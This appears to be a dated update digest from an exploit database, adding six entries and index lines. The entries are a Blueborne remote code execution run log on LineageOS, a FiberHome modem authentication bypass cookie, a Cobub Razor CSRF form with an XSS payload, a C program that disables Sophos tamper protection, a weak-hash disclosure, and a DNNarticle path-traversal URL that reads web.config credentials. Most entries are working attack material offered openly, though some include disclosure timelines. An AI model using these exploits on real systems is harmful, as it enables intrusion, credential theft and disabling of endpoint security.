DB: 2018-04-07

6 changes to exploits/shellcodes

Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass
Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption

LineageOS 14.1 Blueborne - Remote Code Execution
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass
DotNetNuke DNNarticle Module 11 - Directory Traversal
Cobub Razor 0.7.2 - Cross Site Request Forgery

exploits/android/remote/44415.txt

@@ -0,0 +1,86 @@
+# Exploit Title: LineageOS 14.1 (Android 7.1.2) Blueborne RCE CVE-2017-0781
+# Date: 04/01/2018
+# Exploit Author: Marcin Kozlowski <marcinguy@gmail.com>
+# Tested on: LinageOS 14.1 (Android 7.1.2) without BlueBorne Patch
+# CVE : CVE-2017-0781
+
+# Provided for legal security research and testing purposes ONLY.
+
+Code in exp4.py
+
+More info in Repo:
+
+https://github.com/marcinguy/android712-blueborne
+
+Sample Execution:
+
+$python exp4.py hci0 84:55:A5:B6:6F:F6
+[*] Pwn attempt 0:
+[*] Set hci0 to new rand BDADDR 16:e1:66:a7:8a:3d
+[↘] Doing stack memeory leak...
+00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
+00000000
+01: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
+00000000
+02: 00000000 00000000 00000000 ad0911c4 9a2ed2c8 00000018 00000044 acf3de5d
+acf4d67d
+03: acf475e1 ad0911c4 a7c61ac0 16e166a7 00008a3d 00000000 b4300500 b4300970
+1187a437
+04: 00000000 9a2ed2a8 000003f3 00020001 9a2e0700 acfac80a b2f1fee0 ad08fb74
+b5215a97
+05: b4300500 b4300970 b2f1d220 00000000 00000001 b5225001 1187a437 00000000
+00000000
+06: a7c38bc0 aa5753c0 aa5753c8 b2f79360 00000008 00000000 b5233a89 00000001
+00000000
+07: 00000000 00000000 ad08fb74 acf61330 1187a437 00000008 a7c38bc0 b2f79360
+acfc9968
+08: b2f79360 00000000 a7c0f0e8 a7c38bc0 b2f79360 acfc9968 acf588f7 00000000
+a7c38bc0
+09: a7c00000 b4300500 00000003 a7c63b60 a7c00000 b4300500 b4300a78 aa5753c8
+a7c63b60
+10: ad0911c4 ad08fb74 b5225d3b 00000063 aa5753c8 b4300500 00000000 aa5753c8
+b5225d67
+11: acf3e0f5 ad07a770 00000000 a7c63b60 00000013 b5235ad5 00000063 a7c63b60
+b4300500
+12: b4300970 b2f1d418 00000000 00000001 b5225001 1187a437 a7c63b60 00000044
+00000013
+13: 00000000 00000044 a7c63b60 ad0911c4 ad08fb74 acf3df91 00000040 a7c63b70
+00000000
+14: acf472db a7c0fa24 b5225d3b 0000001d aa5753c8 b4300500 00000000 aa5753c8
+b5225d67
+15: 9a2ed4b0 a7c0f778 0000000f b2f1d298 00000000 b5235ad5 0000001d b2f1d298
+aa5753c8
+16: 00000000 9a2ed8d8 00000000 9a2ed4b0 b5235d03 00000000 9a2ed4b0 1187a437
+00000008
+17: b2f1d430 1187a437 a7c0f250 b2f1d298 9a2ed8d8 b51ea361 00000001 00000000
+a7c0f778
+18: 1187a437 9a2ed8d8 acf59793 1187a437 a7c0f780 00000001 a7c0fa18 9a2ed8d8
+00000000
+19: 9a2ed4b0 a7c0f778 a7c0fa24 acf58f85 00000001 0000003e a7c0fa18 00000000
+00000005
+[*] LIBC  0xb51ea361
+[*] BT    0xacf4d67d
+[*] libc_base: 0xb5142000, bss_base: 0xacece000
+[*] system: 0xb5216b4d, acl_name: 0xad08160c
+[*] Set hci0 to new rand BDADDR e3:83:0c:ab:03:c6
+[*] system    0xb5216b4d
+[*] PAYLOAD "\x17\xaa\xaaAAAAMk!\xb5";
+    touch /data/local/tmp/test
+    #
+[+] Connecting to BNEP again: Done
+[+] Pwning...: Done
+[*] Looks like it didn't crash. Possibly worked
+
+
+Payload executed:
+
+s3ve3g:/ # ls -la /data/local/tmp/
+
+total 24
+drwxrwxrwx 2 shell shell 4096 2014-01-13 02:05 .
+drwxr-x--x 3 root  root  4096 2014-01-22 00:36 ..
+-rw------- 1 root  root  5773 2018-03-25 12:51 apt.conf.owMBvd
+-rw------- 1 root  root  1182 2018-03-25 12:51 apt.data.HdUevr
+-rw------- 1 root  root   455 2018-03-25 12:51 apt.sig.kv2PHc
+-rw------- 1 1002  1002     0 2014-01-13 02:05 test
+s3ve3g:/ #

exploits/hardware/webapps/44413.txt

@@ -0,0 +1,55 @@
+# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass
+# Date: 04/03/2018
+# Exploit Author: Noman Riffat
+# Vendor Homepage: http://www.fiberhome.com/
+# CVE : CVE-2018-9248, CVE-2018-9248
+
+The vulnerability exists in plain text & hard coded cookie. Using any
+cookie manager extension, an attacker can bypass login page by setting the
+following Master Cookie.
+
+Cookie: Name=0admin
+
+Then access the homepage which will no longer require authentication.
+http://192.168.10.1/
+
+Due to improper session implementation, there is another way to bypass
+login. The response header of homepage without authentication looks like
+this.
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Tue, 03 Apr 2018 18:33:12 GMT
+Set-Cookie: Name=; path=/
+Content-Type: text/html
+Connection: close
+
+<html><head><script language='javascript'>
+parent.location='login.html'
+</script></head><body></body></html>HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Tue, 03 Apr 2018 18:33:12 GMT
+Content-Type: text/html
+Connection: close
+
+<html>
+<head>
+.. continue to actual homepage source
+
+The response header looks totally messed up and by triggering burp suite
+and modifying it to following will grant access to homepage without
+authentication.
+
+HTTP/1.1 200 Ok
+Server: micro_httpd
+Cache-Control: no-cache
+Date: Tue, 03 Apr 2018 18:33:12 GMT
+Set-Cookie: Name=; path=/
+Content-Type: text/html
+Connection: close
+
+<html>
+<head>
+.. continue to actual homepage source

exploits/php/webapps/44416.txt

@@ -0,0 +1,22 @@
+# Exploit Title: [Cobub Razor 0.7.2 Cross Site Request Forgery]
+# Date: [2018-03-07]
+# Exploit Author: [ppb（ppb@5ecurity.cn）]
+# Vendor Homepage: [https://github.com/cobub/razor/]
+# Software Link: [https://github.com/cobub/razor/]
+# Version: [0.72] 
+# CVE : [CVE-2018-7746]
+
+There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.
+
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
+      <input type="hidden" name="channel_id" value="979" />
+      <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
+      <input type="hidden" name="platform" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/windows/local/44410.txt

@@ -0,0 +1,111 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
+[+] ISR: Apparition Security           
+ 
+
+
+Vendor:
+=============
+www.sophos.com
+
+
+
+Product:
+===========
+Sophos Endpoint Protection v10.7
+
+Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system.
+Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
+anti-malware, web security, malicious traffic detection, and deep system cleanup.
+
+
+
+Vulnerability Type:
+===================
+Tamper Protection Bypass
+
+
+CVE Reference:
+==============
+CVE-2018-4863
+
+
+Security Issue:
+================
+Sophos Endpoint Protection offers an enhanced tamper protection mechanism disallowing changes to be made to the Windows registry
+by creating and setting a special registry key "SEDEnabled" as follows:
+
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config
+Create the following registry key:
+"SEDEnabled"=dword:00000001"
+
+From "https://community.sophos.com/kb/en-us/124376" documentation:
+"You must enable the basic Tamper Protection feature on an endpoint in order to use the Enhanced Tamper Protection"
+
+However, this protection mechanism can be bypassed by deleting the following registry key as it is not sufficiently protected.
+"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\"
+
+By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper Protection" once the system has been rebooted.
+Attackers can then create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key.
+The issue undermines the integrity of the endpoint protection as deleting this key stops the tamper protect driver from loading.
+
+
+SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed customers customers are unaffected. 
+All SAV OPM Preview subscribers have had the fix since 2018-03-01.
+
+
+
+Exploit/POC:
+=============
+Compile the below malicious POC "C" code and run on target, PC will reboot then we pwn.
+
+gcc -o sophos-poc.exe sophos-poc.c
+
+"sophos-poc.c"
+
+/***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
+Even with "SEDEnabled"=dword:00000001" set in registry to prevent tampering
+https://community.sophos.com/kb/en-us/124376
+By hyp3rlinx **/
+
+int main(void){
+ system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\"  /f");
+ system("shutdown -t 0 -r -f");
+return 0;
+}
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: December 4, 2017
+Vendor Acknowledgement: December 12, 2017
+Vendor release fixes: March 1, 2018
+Vendor request additional time before disclosing.
+additional time has passed.
+April 4, 2018  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/local/44411.txt

@@ -0,0 +1,90 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt
+[+] ISR: Apparition Security            
+ 
+
+
+Vendor:
+==========
+www.sophos.com
+
+
+
+Product:
+===========
+Sophos Endpoint Protection - Control Panel v10.7
+
+Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system.
+Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
+anti-malware, web security, malicious traffic detection, and deep system cleanup.
+
+
+
+Vulnerability Type:
+===================
+Insecure Crypto
+
+
+
+CVE Reference:
+==============
+CVE-2018-9233
+
+
+
+Security Issue:
+================
+Sophos endpoint protection control panel authentication uses weak unsalted unicoded cryptographic hash (SHA1) function, not using salt allows attackers that gain access to hash 
+ability to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow for
+changing of settings, whitelist or unquarantine files.
+
+Password and config for Sophos endpoint protection control panel is stored here:
+C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml
+
+e.g.
+
+SHA1 (Unicode) encoding non salted pass = abc123
+
+<TamperProtectionManagement><settings>
+<enabled>true</enabled><password>689307D2FC53AF0FB941BC1BB42737CE4F3EF540</password></settings>
+</TamperProtectionManagement>
+
+
+Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify.
+
+C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));"
+689307d2fc53af0fb941bc1bb42737ce4f3ef540
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+Low
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: December 4, 2017
+Vendor Acknowledgement: December 12, 2017
+Vendor request additional time before disclosing.
+additional time has passed.
+April 4, 2018  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/webapps/44414.txt

@@ -0,0 +1,66 @@
+ ##############################
+
+01. ### Advisory Information ###
+Title: Directory Traversal Vulnerability in DNNarticle module
+Date published: n/a
+Date of last update: n/a
+Vendors contacted: zldnn.com
+Discovered by: Esmaeil Rahimian
+Severity: Critical
+
+02. ### Vulnerability Information ###
+
+OVE-ID: CVE-2018-9126.
+
+03. ### Introduction ###
+
+DNN Article is not only a powerful module to enable post and manage
+articles, but also provides total solutions for content management. Content
+such as articles, news, announcements, product catalogs, etc can be
+organized into unlimited levels of categories. New content can be moderated
+before published. The administrator can assign roles as moderator. Also an
+email can be sent when new content is added. Visitors can make comment and
+rating. They can also agree or disagree an article.  The product supports
+common features of DotNetNuke module such as localization, portable
+interface, search, Syndication etc. It can integrate with Twitter,
+Facebook, Google Map, Windows Live Writer and DotNetNuke Journal to provide
+more powerful functions for your portals.   DNNArticle is an extendable
+system. There are several sub modules shipped with DNNArticle standard
+edition to provide rich and attractive look and feel experiences. There are
+also several optional sub modules that provide more features. And the
+number of optional sub modules is growing continually. There are also
+several applications based on DNNArticle such as DNNArticle Blog and
+DNNArticle Product. DNNArticle fully supports template and CSS theme. This
+feature provides more flexibility for users to build more attractive user
+interface.
+
+zldnn.com
+
+04. ### Vulnerability Description ###
+
+The DNNArticle module 11 for DNN (formerly DotNetNuke) allows remote
+attackers to read the web.config file, and consequently
+discover database credentials, via the /GetCSS.ashx/?CP=%2fweb.config URI.
+
+
+05. ### Technical Description / Proof of Concept Code ###
+desktopmodules/DNNArticle/GetCSS.ashx/?CP=%2fweb.config&smid=512&portalid=3
+with this link the attacker can see the web.config file and find DB name
+and see the user name and passwords of DB
+
+06. ###  Affected Product Code Base ###
+DnnArticle Module for DotNet Nuke - 11
+Affected Component:
+DNNArticle Module
+[Attack Type]
+Remote
+[Impact Information Disclosure]
+True
+[Attack Vectors]
+Attacker can see the web.config file that contain critical information
+06. ### Credits ###
+
+SecureHost[Research Team] - www.securehost.co
+
+This vulnerability has been discovered by:
+Esmaeil Rahimian - [www.securehost.co] - Rahimian(at)SecureHost(dot)co

files_exploits.csv

@@ -9633,6 +9633,8 @@ id,file,description,date,author,type,platform,port
 44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
 44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
 44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
+44410,exploits/windows/local/44410.txt,"Sophos Endpoint Protection 10.7 - Tamper-Protection Bypass",2018-04-06,hyp3rlinx,local,windows,
+44411,exploits/windows/local/44411.txt,"Sophos Endpoint Protection Control Panel 10.7 - Weak Password Encryption",2018-04-06,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16378,6 +16380,7 @@ id,file,description,date,author,type,platform,port
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7  - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
+44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39107,3 +39110,6 @@ id,file,description,date,author,type,platform,port
 44406,exploits/php/webapps/44406.txt,"Z-Blog 1.5.1.1740 - Cross-Site Scripting",2018-04-05,zzw,webapps,php,
 44407,exploits/php/webapps/44407.txt,"Z-Blog 1.5.1.1740 - Full Path Disclosure",2018-04-05,zzw,webapps,php,
 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
+44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
+44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
+44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,